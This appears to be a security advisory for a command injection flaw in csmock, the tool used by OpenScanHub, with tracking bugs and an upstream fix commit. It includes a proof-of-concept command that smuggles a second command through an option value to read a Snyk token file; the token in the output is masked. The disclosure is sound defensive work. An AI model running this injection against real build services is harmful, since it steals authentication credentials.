csmock, which is used by the OpenScanHub (OSH) service, is vulnerable to a command injection attack. The command is isolated by mock (which internally uses systemd-nspawn) but the Snyk authentication token is accessible while the command is being executed: $ csmock -r rhel-9-x86_64 -t snyk -f python-certifi-2018.10.15-4.el8ost.src.rpm --snyk-code-test-opts='--help; cat /builddir/.config/configstore/snyk.json #' [...] { "api": "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" } This vulnerability was introduced by the following commit: https://github.com/csutils/csmock/commit/73eddc138c8e9c97246dd2d12ad30a2a13bea3f4
Created csmock tracking bugs for this issue: Affects: epel-all [bug 2270495] Affects: fedora-all [bug 2270496]
upstream fix: https://github.com/csutils/csmock/commit/b3503d48696cb2ec8eb2fb379fb57c141f08e8da